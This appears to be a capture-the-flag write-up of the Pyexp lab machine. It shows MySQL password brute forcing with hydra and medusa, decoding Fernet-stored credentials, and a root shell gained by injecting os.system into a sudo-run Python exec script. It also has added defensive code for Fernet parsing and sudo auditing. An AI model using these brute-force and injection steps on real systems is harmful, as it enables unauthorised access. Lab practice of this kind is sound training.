This post is a write-up of the Pyexp machine from Vulnhub.
You can check the machine from this link.
Scan open ports
The first thing that I always do is to scan open ports.
nmap -sC -sV 192.168.11.142 -p-
Here I check all ports of the target machine.
I got the following result.
1337/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 f7:af:6c:d1:26:94:dc:e5:1a:22:1a:64:4e:1c:34:a9 (RSA)
| 256 46:d2:8d:bd:2f:9e:af:ce:e2:45:5c:a6:12:c0:d9:19 (ECDSA)
|_ 256 8d:11:ed:ff:7d:c5:a7:24:99:22:7f:ce:29:88:b2:4a (ED25519)
3306/tcp open mysql MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.23-MariaDB-0+deb10u1
| Thread ID: 39
| Capabilities flags: 63486
| Some Capabilities: Speaks41ProtocolOld, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsTransactions, SupportsCompression, Speaks41ProtocolNew, ODBCClient, DontAllowDatabaseTableColumn, InteractiveClient, ConnectWithDatabase, IgnoreSigpipes, SupportsLoadDataLocal, LongColumnFlag, FoundRows, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: ,S=xdmx46S}@dXl5`eZq
|_ Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I noticed that SSH is open on port 1337, and the machine is running a MySQL service.
Inspecting MySQL
I first inspected the MySQL service, since I didn't know the target machine's SSH credentials yet.
With the version found in the nmap result, I searched for vulnerabilities.
However, I couldn't find one, so I chose the hard way: brute force.
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.11.142 mysql
I often use hydra for brute forcing, but this time it didn't go well.
It threw the following error.
[ERROR] all children were disabled due too many connection errors
I tried alternative tools: I checked medusa and ncrack.
Both of them worked well, but ncrack was slightly faster.
medusa -u root -P /usr/share/wordlists/rockyou.txt -h 192.168.11.142 -M mysql
Then it showed me root's credentials.
ACCOUNT FOUND: [mysql] Host: 192.168.11.142 User: root Password: prettywoman [SUCCESS]
Good. Let’s log in with the credentials and see what databases are in there.
mysql -h 192.168.11.142 -u root -p
+--------------------+
| Database |
+--------------------+
| data |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
The database named data caught my eye.
I checked the tables inside it.
+----------------+
| Tables_in_data |
+----------------+
| fernet |
+----------------+
There's a table called fernet.
I had no idea what it meant, so I queried the values inside the table.
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| cred | keyy |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= | UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
OK, there are two columns: cred and keyy.
Both of them are encrypted, so I think I need to decrypt them first.
After a little googling, I found an [online tool](https://asecuritysite.com/tokens/ferdecode) to decode Fernet encryption.
Python source code for decoding Fernet is also published in many GitHub repositories, so if you prefer using source code, go for it.
When I decoded the Fernet values, I found the following credentials.
lucy:wJ9`"Lemdv9[FEw-
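As an added example (not part of the original write-up), the following Python shows what a Fernet token actually is: it splits the cred value into its fields, reads the creation timestamp the format stores in the clear, and checks the token's HMAC with the signing half of the keyy value using only the standard library. Decryption needs AES, so it is done only if the third-party cryptography package happens to be installed. The example assumes the token and key were copied exactly as shown in the table above.

```python
import base64
import hashlib
import hmac
import struct
from datetime import datetime, timezone

# Values copied from the page's `fernet` table: cred holds the token, keyy the key.
TOKEN = "gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys="
KEY = "UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0="


def parse_fernet_token(token):
    """Split a Fernet token into its fields: version | timestamp | IV | ciphertext | HMAC."""
    raw = base64.urlsafe_b64decode(token)
    if len(raw) < 57 or raw[0] != 0x80:
        raise ValueError("not a version-0x80 Fernet token")
    ciphertext = raw[25:-32]
    if len(ciphertext) % 16 != 0:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    return {
        "version": raw[0],
        "timestamp": struct.unpack(">Q", raw[1:9])[0],  # seconds since epoch, big-endian
        "iv": raw[9:25],
        "ciphertext": ciphertext,
        "hmac": raw[-32:],
        "signed": raw[:-32],  # everything the HMAC covers
    }


def issued_at_utc(token):
    """Fernet tokens carry their creation time unencrypted; return it as ISO-8601 UTC."""
    ts = parse_fernet_token(token)["timestamp"]
    return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()


def verify_fernet_hmac(token, key):
    """Check the token's HMAC-SHA256 using the signing half (first 16 bytes) of the key."""
    key_bytes = base64.urlsafe_b64decode(key)
    if len(key_bytes) != 32:
        raise ValueError("Fernet key must decode to 32 bytes")
    signing_key = key_bytes[:16]  # bytes 16..31 are the AES-128-CBC key
    parts = parse_fernet_token(token)
    expected = hmac.new(signing_key, parts["signed"], hashlib.sha256).digest()
    return hmac.compare_digest(expected, parts["hmac"])


def decrypt_if_available(token, key):
    """Decrypt with the third-party `cryptography` package if installed, else return None."""
    try:
        from cryptography.fernet import Fernet
    except ImportError:
        return None
    return Fernet(key.encode()).decrypt(token.encode()).decode()


if __name__ == "__main__":
    parts = parse_fernet_token(TOKEN)
    print("issued at:", issued_at_utc(TOKEN))
    print("ciphertext bytes:", len(parts["ciphertext"]))
    print("HMAC valid with stored key:", verify_fernet_hmac(TOKEN, KEY))
    print("plaintext:", decrypt_if_available(TOKEN, KEY))
```

The point for a defender is the storage pattern, not the algorithm: Fernet is symmetric, so a key kept in the same table as the ciphertext gives no confidentiality against anyone who can read that table, and the HMAC only proves the token was not altered. The timestamp field also leaks when the secret was created.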
SSH connection
Thanks to the credentials found in the database, I managed to SSH into the target machine.
Be aware of the port number! It’s not 1337.
lucy@pyexp:~$ whoami
lucy
You can find the user flag in the home directory.
The next mission is to get root privileges.
Privilege escalation
The first action I took was to check sudo permissions.
sudo -l
(root) NOPASSWD: /usr/bin/python2 /opt/exp.py
It shows that I can run the Python script /opt/exp.py with sudo.
Before running the Python script, let's check what it contains.
uinput = raw_input('how are you?')
exec(uinput)
The variable uinput takes input from the user.
Then the script executes that input with the exec statement.
It is very straightforward. I entered the following to open a bash shell.
sudo /usr/bin/python2 /opt/exp.py
how are you?import os;os.system("/bin/bash")
Then a bash shell is executed as the root user.
root@pyexp:/opt# whoami
root
You can find the root flag in the root directory.
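As an added example (not code from the original write-up or from the machine), here is the defender's side of the two mistakes above, written in Python 3: a hardened replacement for the exec pattern that treats the reply as data instead of code, and a small audit helper that flags entries in `sudo -l` output which hand a user an interpreter. The sample `sudo -l` output is constructed for the example; only the /opt/exp.py rule is taken from the page, and the set of interpreter names is an assumption you can extend.

```python
import os
import re

# Hardened replacement for the page's /opt/exp.py pattern
# (uinput = raw_input('how are you?'); exec(uinput)): interpret the reply as data only.
ALLOWED_ANSWERS = {"fine", "good", "ok", "bad", "tired"}


def handle_answer(uinput):
    """Map a free-text reply onto a fixed set of responses; never evaluate it."""
    answer = uinput.strip().lower()
    if answer not in ALLOWED_ANSWERS:
        # Anything else, including text that looks like Python, is just rejected.
        return "Sorry, I did not understand that."
    return "Glad to hear you are " + answer + "."


# Interpreter basenames (assumed list) whose appearance in a sudo rule means the rule
# effectively grants arbitrary code execution as the run-as user.
INTERPRETERS = ("python", "perl", "ruby", "php", "node", "bash", "sh", "dash", "zsh")

# Matches rule lines such as "(root) NOPASSWD: /usr/bin/python2 /opt/exp.py".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

# Constructed sample output; the python2 line is the rule shown on the page.
SAMPLE_SUDO_L = """\
Matching Defaults entries for lucy on pyexp:
    env_reset, mail_badpass

User lucy may run the following commands on pyexp:
    (root) NOPASSWD: /usr/bin/python2 /opt/exp.py
    (root) /usr/bin/systemctl restart nginx
"""


def _is_interpreter(path):
    base = os.path.basename(path)
    # python, python2, python3.8 ... but not e.g. "shutdown" for "sh".
    return any(re.fullmatch(name + r"[0-9.]*", base) for name in INTERPRETERS)


def risky_sudo_rules(sudo_l_output):
    """Return the rules in `sudo -l` output that run an interpreter or grant ALL."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        command = m.group("cmd").strip()
        first = command.split()[0]
        if first == "ALL" or _is_interpreter(first):
            findings.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD:" in m.group("tags"),
                "command": command,
            })
    return findings


if __name__ == "__main__":
    print(handle_answer("fine"))
    print(handle_answer("import os"))
    for finding in risky_sudo_rules(SAMPLE_SUDO_L):
        print("risky sudo rule:", finding)
```

Both halves matter: the script is only safe once it stops evaluating its input, and the sudo rule is only safe once it no longer points at an interpreter whose behaviour is decided by a script the user can influence.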
This is the end of the machine.
Conclusion
This machine was easy to exploit and very straightforward.
There are two takeaways from this machine.
- Unusually, it requires brute force to obtain credentials.
- It requires some knowledge of Fernet encryption.
I hope this write-up was helpful.
Thanks for reading.